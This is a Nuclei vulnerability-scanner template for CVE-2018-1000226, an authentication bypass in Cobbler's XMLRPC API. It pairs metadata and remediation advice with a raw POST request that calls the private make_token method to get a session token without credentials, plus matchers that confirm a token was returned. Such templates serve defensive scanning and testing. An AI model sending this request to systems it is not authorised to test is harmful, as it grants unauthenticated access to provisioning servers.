nuclei-templates/http/cves/2018/CVE-2018-1000226.yaml

id: CVE-2018-1000226

info:
  name: Cobbler - Authentication Bypass
  author: c-sh0
  severity: critical
  description: Cobbler versions 2.6.11+, but code inspection suggests at least 2.0.0+ and possibly even older versions, may be vulnerable to an authentication bypass vulnerability in XMLRPC API (/cobbler_api) that can result in privilege escalation, data manipulation or exfiltration, and LDAP credential harvesting. This attack appear to be exploitable via "network connectivity". Taking advantage of improper validation of security tokens in API endpoints. Please note this is a different issue than CVE-2018-10931.
  remediation: |
    Apply the latest security patches or updates provided by the vendor to fix the authentication bypass vulnerability in Cobbler.    
  reference:
    - https://github.com/cobbler/cobbler/issues/1916
    - https://movermeyer.com/2018-08-02-privilege-escalation-exploits-in-cobblers-api/
    - https://nvd.nist.gov/vuln/detail/CVE-2018-1000226
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2018-1000226
    cwe-id: CWE-732
    epss-score: 0.01552
    epss-percentile: 0.85716
    cpe: cpe:2.3:a:cobblerd:cobbler:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: cobblerd
    product: cobbler
  tags: cve,cve2018,cobbler,auth-bypass,cobblerd

http:
  - raw:
      - |
        POST {{BaseURL}}/cobbler_api HTTP/1.1
        Host: {{Hostname}}
        Content-Type: text/xml

        <?xml version='1.0'?>
        <methodCall>
          <methodName>_CobblerXMLRPCInterface__make_token</methodName>
          <params>
            <param>
              <value>
                <string>cobbler</string>
              </value>
            </param>
          </params>
        </methodCall>        

    matchers-condition: and
    matchers:
      - type: dsl
        dsl:
          - "!contains(tolower(body), '<name>faultCode</name>')"

      - type: word
        part: header
        words:
          - "Content-Type: text/xml"

      - type: word
        part: body
        words:
          - "<methodResponse>"

      - type: regex
        part: body
        regex:
          - "(.*[a-zA-Z0-9].+==)</string></value>"

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100b203eeaa3c21c2aa5b7fe886ab8524f7df3c00cddc5b808d2c417f511729d47202204442fc6fa5e9dfb4b3e7a64d83fd565402edb9f5d0bc2a78853475097b673a7e:922c64590222798bb761d5b6d8e72950